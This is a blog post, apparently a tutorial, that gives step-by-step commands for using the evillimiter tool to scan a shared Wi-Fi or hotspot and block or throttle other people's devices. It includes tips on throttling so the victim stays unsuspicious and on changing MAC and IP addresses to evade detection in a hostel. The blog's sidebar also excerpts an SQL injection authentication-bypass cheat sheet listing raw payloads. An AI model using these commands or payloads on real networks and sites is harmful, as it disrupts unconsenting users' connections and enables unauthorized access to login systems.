Skip to main content

How to manage hosts of Wi-Fi router/Hotspot

 


Do you have a router at your home? if you have one, you must face some problems. such as your brother/sister is streaming on 720p while you are working on something. or someone else has already used the daily limit. well, most problems are related to internet speed. so, what do you do to face such a situation? there are some routers that provide a web-interface to manage devices connected to the router. but what if you are using the mobile hotspot. well, Android doesn’t have so much option to manage the devices.


In this article, we are going to use a tool named “Evilimiter”. we will manage devices which are connected to wifi. doesn’t matter if you are on wifi router or mobile hotspot. you will be able to run internet connection very fairly. more fun, if you are at a college hostel. but I won’t recommend this. but still, if you are curious, you will need to change mac address before doing this at the hostel. and try to continuously change the local IP provided by the router.

 

ATTACK

First of all, download this tool on your Linux System. type this command:

git clone https://github.com/bitbrute/evillimiter.git

Screenshot:

by the way, the creators have also made it available on windows. you can check it out HERE. because we are not going to talk about it here. it is easy on windows, I think you can try it your self.

When the downloading gets completed, go to the downloaded directory and run this command:

mv bin/evillimiter /bin/

 

Now you have moved the binary file of evillimiter into /bin dir. and now you can access it via single command from anywhere. just type this command:

evillimiter

Screenshot:

the interface is so beautiful. as it says type help or ? to see the help menu.

Screenshot:

and we have a lot of options that will help us to manage devices on our network.

Let’s just scan it once so that the tool may catch all hosts on our network. type this command:

scan

Screenshot:

remember that I have not used range here but you can add the range with --range flag.

to see the hosts that were present during scanning. type this command:

hosts

Screenshot:

we have our hosts expect our own system. status shows free. because the hosts don’t have any rules applied. you can add more hosts manually, via this command:

add <IP> --mac <BSSID>

 

To block someone to access the internet, you can use this command:

block <ID>

ID is the host’s ID. you can check it via host command.

and if you think to block a person would make him suspects you, you can choose to limit internet speed to that host. he won’t be able to use more than you have specified. type this command:

limit 1 50kbit --download

Screenshot:

where 1 is the host’s ID and 50kbit is the speed that he is limited to. and --download flag is for downloading speed.

to free a host from any limitation. you can use this command:

free <ID>

 

 

 

Thanks For Visiting.

Comments

  1. Nice post!! Thanks for sharing. Happy to read your Blog. If you want to know about Belkin Login you can visit here.

    ReplyDelete

Post a Comment

Popular posts from this blog

How To Make Personal Diary And Notes On WhatsApp, Learn These Special Tips

  In today’s era, the use of smartphones is constantly increasing, WhatsApp is the most special app on smartphones and it has become a special part of people’s lives as well. It is being used for personal and office work. Constantly new updates have been coming on WhatsApp, but in this report, we have been giving you some special tips with the help of which you can make a personal diary or notes on WhatsApp. Let’s know. We do most of our work from our smartphone only. In such a situation, when we have to note some important things or make a list, we share it on phone notes or WhatsApp. Many times, from office to personal work, we also share on WhatsApp. We write our important thing or any message and send it to any of our family members or friends on WhatsApp. Doing this can sometimes result in frontal confusion, so today we are telling you the trick of such a big work of WhatsApp which you can use to save your important work or any document. You can also use your WhatsApp like a p...

MY OVERTHEWIRE.ORG/BANDIT JOURNEY

Best Sellers in Sports, Fitness & Outdoors   This is my write-up for overthewire.org  bandit  wargames. About OverTheWire.Org Bandit Wargames This game was designed in a ctf (capture the flag) format to help you learn the basics of linux and do so while having fun. Completing this wargame will also prepare for advanced levels of wargames. There are a total of 34 levels in bandit as of date. More maybe added in the future. Start from level 0. To move to the next higher level, find the key/flag (information/file/password) you get from the solving the current level. Structure of the Walkthrough Each level is broken in to 3 sections. The Level Goal, How to Complete and Lesson Learnt. The  Level Goal  section sets the objective of the level. The  How to Complete  provides detailed walkthrough to achieve the goal. The  Lesson Learnt  section provides reference to commands used to solve the level and will enable further learning. Recommen...

SQL Injection Authentication Bypass Cheat Sheet

  This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please feel fr ee to leave a comment in order to improve and expand the list. or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') ...